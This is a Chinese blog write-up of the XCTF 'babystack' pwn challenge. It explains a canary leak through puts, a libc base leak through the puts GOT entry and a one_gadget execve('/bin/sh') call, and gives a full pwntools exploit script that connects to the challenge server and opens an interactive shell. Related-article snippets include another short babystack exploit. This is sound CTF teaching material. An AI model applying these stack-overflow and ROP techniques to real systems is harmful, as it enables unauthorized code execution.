XCTF PWN高手进阶区之babystack

最新推荐文章于 2023-04-20 00:39:38 发布
最新推荐文章于 2023-04-20 00:39:38 发布
阅读量468 收藏
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/neuisf/article/details/104114123
版权

此题,开启了RELRO、NX、CANARY,未开启PIE,只有read函数溢出存在溢出可能。
第一,泄露canary,程序会通过puts函数输出缓冲区s的内容。puts函数在输出时,只有遇到\0才会结束,而缓冲区s又和main函数的canary相连,此时,输入和缓冲区大小相等的字符串,溢出的\n将会覆盖canary的第一字节00,从而将canary的后三个字节输出,构建canary。
第二,获取shell。
尝试通过DynELF,leak 泄露libc system地址,发现每次执行输出的内容不相同,有时会报检测到栈溢出(stack smashing detected),有时不会。放弃。
通过read函数写入/bin/sh,调用system函数,未找到pop rdi,pop rsi, pop rdx ret。放弃
最后,通过ong_gadget找到execve(’/bin/sh’)的地址执行。
exp:
from pwn import *
p=remote(‘111.198.29.45’,‘35429’)
elf=ELF(’./babystack’)
puts_plt=elf.plt[‘puts’]
puts_got=elf.got[‘puts’]
start_addr=0x400720
ebp=0x400a30
pop_ret=0x400a92
pop_rdi=0x400a93
libc=ELF(’./libc-2.23.so’)
print p.recv()
print p.sendline(“1”)
payload=‘a’*130+‘b’*6
p.sendline(payload)
print p.recvuntil(">>")
p.sendline(“2”)
print p.recvuntil(‘bbbb’)
canary=p.recv()[3:10].rjust(8,’\0’)
print “%016x”%u64(canary)
p.sendlineafter(">> “,‘1’)
payload=‘a’*136+canary+p64(ebp)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(start_addr)
p.sendline(payload)
p.sendlineafter(”>> “,‘3’)
data= p.recv(7).ljust(8,’\0’)
print “puts_got:”+hex(u64(data))
base_addr=u64(data)-libc.sym[‘puts’]
print “base:”+hex(base_addr)
system_addr=libc.sym[‘system’]+base_addr
execve_addr=0x45216+base_addr
print hex(libc.sym[‘execve’]+base_addr)
payload=‘a’*136+canary+p64(ebp)+p64(execve_addr)
print p.sendlineafter(”>> “,“1”)
p.sendline(payload)
print p.sendlineafter(”>> ",“3”)
p.interactive()

neuisf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1341
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
从0ctf2018 babystack学习return to dl-resolve
极目楚天舒的博客
05-06 1812
0x01程序分析首先查看main函数,比较简单,调用了alarm和sub_80483B,进入sub_80483B看看。sub_80483B的作用是读取0x40个字节到ebp-40处,这里显然存在栈溢出漏洞。发现只开了一个栈不可执行,于是想构造rop链。但是整个文件搜索下来也没有发现什么有价值的gadget。0x02  return to dl-resolve知识学习玩过pwn的赛棍都知道,pwn题...
PWN · ret2text】[BJDCTF 2020]babystack
Mr_Fmnwon的博客
04-20 759
作为pwn新手,尽可能在刷题中,记录、学习一些通用的知识点,因此wp是少不了的。本题是一道简单的ret2text。
xctf pwn1
qq_41071646的博客
05-14 947
这个题目我不知道为什么在网址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个题 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个题 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
xctf-pwn-“stack2 & pwn1 & welpwn
njh18790816639的博客
07-30 181
stack2 首先探测一番,是32位,看下保护! ida静态分析一番! 还有个后门函数: 原先先要使用这个后门函数,但是发现远程服务器是没有bash的,所以这个后门函数是没有用的,误导我等! 不过还是先按正常思路来说,这第三个函数是没有检查数据的合法性的。 ...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 393
做题记录
Babystack
pppp974的博客
08-19 482
#!/usr/bin/env python from pwn import * elf=ELF('./babystack') libc=ELF('./libc-2.23.so') p=remote('111.198.29.45',30865) prdi_addr=0x400a93 main_addr=0x400908 one_gadget=0x45216//找到库中('bin/sh')的相对地址 ...
xctf攻防世界pwn基础题解(新手食用)
热门推荐
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
XCTF PWN高手进阶 之 js
neuisf的博客
01-28 292
本题程序名为js,随便输入字符串,发现: 输入字符串会打印该字符串; 输入数字时会以科学计数法打印该数字; 输入加法算式会打印加法计算结果; 输入!1会打印false,输入!0会打印true; 输入js_fuck的命令: 提示eval函数执行时引用错误。 因此,推断程序执行是以输入为参数,调用eval运行。 于是: 输入print,打印print函数: 输入read,打印read函数: 1...
stack over flow
cassper的专栏
09-02 2174
stack over flow
XCTF攻防世界进阶writeup(1-5)
stepone4ward的博客
07-04 1261
1. isc-06 进入题目后看到url后存在参数id,尝试各种注入方式后均无果,使用bp对id参数进行爆破后得到flag。 2.NewsCenter 对search参数进行bool类型的盲注 import requests s=requests.session() url="http://111.198.29.45:38153/index.php" key='' for i in range(1...
XCTF PWN高手进阶之JS
neuisf的博客
01-27 369
本题程序名为js,随便输入字符串,发现: 输入字符串会打印该字符串; 输入数字时会以科学计数法打印该数字; 输入加法算式会打印加法计算结果; 输入!1会打印false,输入!0会打印true; 输入js_fuck的命令: 提示eval函数执行时引用错误。 因此,推断程序执行是以输入为参数,调用eval运行。 于是: 输入print,打印print函数: 输入read,打印re...
team [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列28(网站配置错误,需自行配置本地环境测试)
重新启程
01-04 1677
请注意:本题在攻防世界网站配置错误,请自行配置本地环境测试 最近攻防世界的题目pwn高手进阶全部打乱了,所以现在我的题目列表是下面这样的了,搞的我的尴尬症都犯了???? 准备看看能不能把一些题目解决一下,不过其中有些题目的环境是配置错误的,我已经联系网站的工作人员,准备进QQ群。 现在我就先把team这道题目给大家说明一下。这道题目其实并不是太复杂,但是网站的工作人员没有搞清楚这道题目的出题方法...
现代Web开发堆栈工具DevExtreme——增强数据可视化功能
需要界面开发、IDE工具研发中文教程资料的小伙伴,记得私信我~
04-30 450
DevExtreme拥有高性能的HTML5 / JavaScript小部件集合,使您可以利用现代Web开发堆栈(包括React,Angular,ASP.NET Core,jQuery,Knockout等)构建交互式的Web应用程序。从Angular和Reac,到ASP.NET Core或Vue,DevExtreme包含全面的高性能和响应式UI小部件集合,可在传统Web和下一代移动应用程序中使用。 ...
bjdctf 2020 babystack2
pondzhang的专栏
05-19 234
from pwn import * p = process('./bjdctf_2020_babystack2') p.sendlineafter("length of your name:\n","-1") payload = 24*'a'+ p64(0x0000000000400893) + p64(0) + p64(0x0000000000400726) p.sendlineafter("name?\n",payload) p.interactive()
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值